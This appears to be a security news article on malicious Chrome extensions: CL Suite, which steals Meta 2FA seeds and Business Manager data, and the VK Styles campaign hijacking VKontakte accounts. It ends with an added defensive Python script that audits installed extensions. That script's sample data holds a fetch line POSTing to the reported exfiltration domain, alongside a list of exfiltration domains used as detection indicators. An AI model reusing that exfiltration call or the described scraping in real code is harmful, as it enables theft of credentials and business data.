Malicious Chrome Extensions Target Meta Business Suite, VKontakte Users in New Cyberattack Campaign

Malicious Chrome Extensions Exploit Meta Business Suite and VKontakte Users

Cybersecurity researchers have recently uncovered a malicious Google Chrome extension designed to exploit users of Meta Business Suite and Facebook Business Manager. This extension, named CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl), was initially uploaded to the Chrome Web Store on March 1, 2025, and has since been installed by 33 users.

Marketed as a tool to scrape Meta Business Suite data, eliminate verification pop-ups, and generate two-factor authentication (2FA) codes, the extension’s true intent is far more nefarious. According to security researcher Kirill Boychenko from Socket, the extension requests extensive access to meta.com and facebook.com domains. Despite its privacy policy claiming that 2FA secrets and Business Manager data remain local, the extension clandestinely transmits Time-based One-Time Password (TOTP) seeds, current one-time security codes, Meta Business People CSV exports, and Business Manager analytics data to a backend server at getauth[.]pro. Additionally, it has the capability to forward these payloads to a Telegram channel controlled by the threat actor.

The extension’s malicious functionalities include:

– Stealing TOTP Seeds and 2FA Codes: By capturing these authentication elements, attackers can potentially gain unauthorized access to victims’ accounts.

– Extracting Business Manager People Data: The extension navigates to facebook[.]com and meta[.]com to compile a CSV file containing names, email addresses, roles, permissions, statuses, and access details of individuals associated with the Business Manager account.

– Enumerating Business Manager Entities: It builds a comprehensive CSV file detailing Business Manager IDs, names, attached ad accounts, connected pages and assets, as well as billing and payment configurations.

While the extension does not directly steal passwords, the exfiltrated 2FA codes and TOTP seeds can be exploited by attackers who have already obtained login credentials through other means, such as infostealer logs or credential dumps. This combination of information enables unauthorized access to victims’ accounts, posing significant security risks.

Despite its relatively low installation count, the extension provides attackers with sufficient data to identify high-value targets and orchestrate subsequent attacks. Boychenko emphasizes that the extension’s features, such as people extraction, Business Manager analytics, popup suppression, and in-browser 2FA generation, are not mere productivity tools. Instead, they serve as purpose-built scrapers targeting critical Meta platforms, collecting contact lists, access metadata, and 2FA materials directly from authenticated pages.

Chrome Extensions Hijack VKontakte Accounts

In a related development, cybersecurity firm Koi Security has identified a large-scale campaign, codenamed VK Styles, targeting approximately 500,000 users of VKontakte (VK), a popular Russian social media platform. This campaign involves Chrome extensions masquerading as VK customization tools, which, once installed, silently hijack user accounts.

The malicious extensions are designed to perform several unauthorized actions:

– Automatic Subscriptions: Users are involuntarily subscribed to the attacker’s VK groups, increasing the groups’ visibility and reach.

– Resetting Account Settings: Every 30 days, the extensions reset account settings to override user preferences, ensuring persistent control over the accounts.

– Bypassing Security Protections: By manipulating Cross-Site Request Forgery (CSRF) tokens, the extensions circumvent VK’s security measures, facilitating unauthorized actions.

– Maintaining Persistent Control: The extensions employ various techniques to ensure ongoing access and control over the compromised accounts.

These findings underscore the growing threat posed by malicious browser extensions, which can infiltrate user systems under the guise of legitimate tools. Users are advised to exercise caution when installing browser extensions, especially those requesting extensive permissions or originating from unverified sources. Regularly reviewing and auditing installed extensions can help mitigate potential security risks.
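As a practical starting point for the extension audit recommended above, the following script (an added example written for this page, not code from Socket, Koi Security or the extensions they analysed) walks a Chrome profile's Extensions directory and flags three things the article describes: the reported CL Suite extension ID, host access to the Meta and VK domains the campaigns target, and JavaScript sources that reference the getauth.pro backend or the Telegram Bot API. The profile layout (`<profile>/Extensions/<id>/<version>/manifest.json`), the scoring heuristics and the sample manifests are the editor's assumptions; `api.telegram.org` is assumed as the usual endpoint for Telegram-based forwarding and is not named on the page.

```python
"""Audit installed Chrome extensions for the indicators reported in the article.

Assumptions (not from the article): the Chrome profile layout
<profile>/Extensions/<id>/<version>/manifest.json, the heuristics below, and the
api.telegram.org endpoint. The extension ID, the getauth.pro domain and the
targeted hosts (facebook.com, meta.com, vk.com) come from the article.
"""
import json
import re
from pathlib import Path

# Indicators taken from the article.
KNOWN_BAD_IDS = {
    "jkphinfhmfkckkcnifhjiplhfoiefffl": "CL Suite by @CLMasters (Socket report)",
}
EXFIL_DOMAINS = ("getauth.pro", "api.telegram.org")  # api.telegram.org is an assumption
SENSITIVE_HOSTS = ("facebook.com", "meta.com", "vk.com")

# Chrome match pattern: <scheme>://<host>/<path>, optional "*." subdomain wildcard.
HOST_RE = re.compile(r"^(?:\*|https?|wss?)://(?:\*\.)?([^/]+)/")


def host_of(pattern):
    """Return the host of a Chrome match pattern, '*' for <all_urls>, or None."""
    if pattern == "<all_urls>":
        return "*"
    m = HOST_RE.match(pattern)
    return m.group(1) if m else None


def audit_manifest(ext_id, manifest, sources=()):
    """Return sorted findings for one extension.

    manifest: parsed manifest.json; sources: iterable of JS source strings.
    Both MV2 (match patterns in "permissions") and MV3 ("host_permissions")
    layouts are inspected, plus content_scripts "matches".
    """
    findings = set()
    if ext_id in KNOWN_BAD_IDS:
        findings.add(f"known-malicious id: {KNOWN_BAD_IDS[ext_id]}")
    patterns = list(manifest.get("host_permissions", []))
    patterns += [p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"]
    for cs in manifest.get("content_scripts", []):
        patterns.extend(cs.get("matches", []))
    for p in patterns:
        host = host_of(p)
        if host == "*":
            findings.add("broad host access: <all_urls>")
        elif host and any(host == s or host.endswith("." + s) for s in SENSITIVE_HOSTS):
            findings.add(f"access to sensitive host: {p}")
    for src in sources:
        for d in EXFIL_DOMAINS:
            if d in src:
                findings.add(f"source references exfiltration domain: {d}")
    return sorted(findings)


def audit_profile(extensions_dir):
    """Audit every unpacked extension under a Chrome profile's Extensions directory."""
    report = {}
    for manifest_path in Path(extensions_dir).glob("*/*/manifest.json"):
        ext_id = manifest_path.parent.parent.name
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        sources = [p.read_text(encoding="utf-8", errors="ignore")
                   for p in manifest_path.parent.rglob("*.js")]
        findings = audit_manifest(ext_id, manifest, sources)
        if findings:
            report[ext_id] = findings
    return report


# Constructed sample data for a stand-alone run (not real extension code).
SAMPLE_SUSPECT = {
    "manifest_version": 3,
    "name": "CL Suite",
    "host_permissions": ["https://*.facebook.com/*", "https://*.meta.com/*"],
    "permissions": ["storage", "tabs"],
}
SAMPLE_SUSPECT_SOURCE = 'fetch("https://getauth.pro/api/upload", {method: "POST"})'
SAMPLE_BENIGN = {
    "manifest_version": 3,
    "name": "Dark Theme",
    "permissions": ["storage"],
    "content_scripts": [{"matches": ["https://example.com/*"], "js": ["style.js"]}],
}

if __name__ == "__main__":
    for f in audit_manifest("jkphinfhmfkckkcnifhjiplhfoiefffl", SAMPLE_SUSPECT, [SAMPLE_SUSPECT_SOURCE]):
        print("SUSPECT:", f)
    print("benign findings:", audit_manifest("abcdefghijklmnopabcdefghijklmnop", SAMPLE_BENIGN))
```

Run `audit_profile` against a real profile (for example `~/.config/google-chrome/Default/Extensions` on Linux) to get a per-extension finding list; host access to Facebook, Meta or VK is not malicious on its own, so treat those hits as a prompt to read the extension's source and privacy claims side by side, which is exactly the gap the Socket report exposed.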